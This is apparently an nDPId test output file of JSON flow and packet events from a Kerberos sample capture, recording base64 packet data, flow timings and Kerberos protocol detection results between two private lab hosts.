00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1549337952273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1549337952273,"pkt":"pB9ywglqAAgCHEeuCABFAAFyATpAAIAGj1qsEAjJrBAICMApAYWiDvrzQ6ao6FAYAQCdKwAA2XkxbZ8llDCRRskO9gczLnFPBBStfBeg8OgSpqEBOAYdhyM5RDqy\/NVC6gFAjMdVRNF4Ud\/vkuMZvi\/C9TPqJBllB8ilyB5vY\/0m8yd5y16xkjvnwbrb\/W3CqgNY3GxQ0p18n9KBChjcbfQi2adBQLNadPsG91L4HVVYSlDxeVsaDj0AMrkXgx+K3pVveifu4IJvdTmm3dssrOx7ri4BqxH9gyHnnJM+gUu5MIG+gLCwhKX1IYuuZbwXmnO9knNSHi2TJaHys\/IKitqKHwvZMTG4i5pUecWz9NSU996q6A\/\/cM86g4TCvpD7370UyqGGHaccTUUMvb5qsoRczG++plTQXQ5YE69in6j\/JeD8IrT\/3QjjRWw+cBkDPh5zGLRzdI7hQfeBq0OXmrV0OXPvzg6Pl4TznRF\/D32Q4zoFws9t5i+mUoUZd\/0N"}
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952274,"pkt":"AAgCHEeupB9ywglqCABFAAD6FAFAAIAGfQusEAgIrBAIyQGFwClDpqjoog78PVAYAQACfgAAMIQAAADMAgETYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1lU8qvBSW6OfUooizc58b3UUWb1Dc9+q1BnNlk6M5gNl0OBLUYfNGeTN7jVmkr5YZr3HGFOATkbw9DVEo286mQ0yhq4w+ZVjlShGexAg6l9M9U7cWsZU11Tj+uS9vWEh6ZGrVD7TgBU6qOlGAU"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952280,"flow_last_seen":1549337952280,"flow_idle_time":7560000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952280,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1549337952280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952280,"pkt":"pB9ywglqAAgCHEeuCABFAADxAURAAIAGj9GsEAjJrBAICMArAFh+ue0Nm8k31FAYAQCDOwAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyIagSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYjkLV5w61M4dBZf0U0Cc\/K54wTCl69GxhAdEJKI0gkw0Ve5ZSvbl+6jcyFmUgFhA4RyBx9pGsk\/XqrLuUXPEHyz9XOfuzdWYBvPp5yv4UFPIJKI5TMk\/2fkioL\/XfCG7Jr8xEeBwNw3Qk0PtCp3\/DDaU5\/NbtOzNRQiyiFTx75LpVnwmoKHd6R7"}
00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952281,"pkt":"AAgCHEeupB9ywglqCABFAADbFApAAIAGfSGsEAgIrBAIyQBYwCubyT2Ifrnt1lAYAQDVagAATQg2IahlDr4Do2rw09NPfPwlJMuv1fJJCc5mjToXHNxo9crR1AT1CMr5O+bZxtqN6M9uCaNjeNur9XwIFCnpBuL05RtGDqn2i9hJpKd+E88QIO6v0xwHDv6iGr\/8TVgkK3vs2tcuY57O8+c4l9vRR7jejS5ww2dQZlIjb\/CCYROJuvRqA0LHwqGM0CcXmUposD8ISy568tJuLRICL3GBKJj5gtDiSRwMYGKFzsxgs2+QN48="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAABLAUpAAIAGkHGsEAjJrBAICMAsAFiP2F5aCFrVJ1AYAQB5GAAAR6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyJqgFMAMCARI="}
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1549337952282,"pkt":"AAgCHEeupB9ywglqCABFAABYFBBAAIAGfZ6sEAgIrBAIyQBYwCwIWtrbj9hefVAYAQDaWgAAkAFNdIHXOvUSiNrRZ37a2E9NpclNBTiyKWuPGcwkWc2OKSpCtzAbfs9v1WRIgz2U"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":356,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00939{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAAGMAVBAAIAGjyqsEAjJrBAICMAqAb0OVvT1RRDYGlAYAP+BiQAAx2oDxasXfLBTEcjz3tABELHnmrS3ZANlrcp\/hNjXtg\/fwYTBDdsdTzX+XDaW+uv3s2\/LBkJPP0K4Dy0YU3CzKo3pfb0515XvBfsBO7Ma0iP8tOV8txynjcFaEQvYkdi2SQ6bebHRRKNuECPHoWmL3h9GQAZAb4a73kOXQ+HdWdMxxkSNni5ZeogFxLOO9R2cL7EvadD9j700FIRXk1Ysly6p8QSOxUcF2BTlCAMMXraIVwnaJn4OFnBRV1kK62QzrTna4Mma6JSVzK\/6fCHORQn+FIHExUVoG3Vq1BveDwHtG0XGyIXhHabrgc6YQttz\/jzBPNDyI9ROMV3pQ0pZrTLzCjs+95mV\/WzyQTG\/SRF7u\/0NE9yZnVgk7HZw7F9bqd7MfX+aga2J6\/HQLbCChYzLyXsDW8WbBsbXh+XIiTyOIboYMLvBqY271GjiVoIyA7mbRvLsykMc7DElauDSPsA2vtc="}
00807{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337952283,"pkt":"AAgCHEeupB9ywglqCABFAAEsFBRAAIAGfMasEAgIrBAIyQG9wCpFENgaDlb2WVAYAP9XsAAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABhAAAAAAQAAFesIp3Ms9YkV3HyzmcNx+gJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUXiUY0MYNrse7Xdy+nvFD1NZYMmVWsdodfXY9v69kCk+MLVD1Rqj48zpMQyXFgAZRbdNaLq\/lZFH5cVcwmZOZp6PzJLHFRz2Ys9FBPKwjMkCOL5scijYfadSqIU\/eT7q\/ACDBFzzf8MmsOdu9E="}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
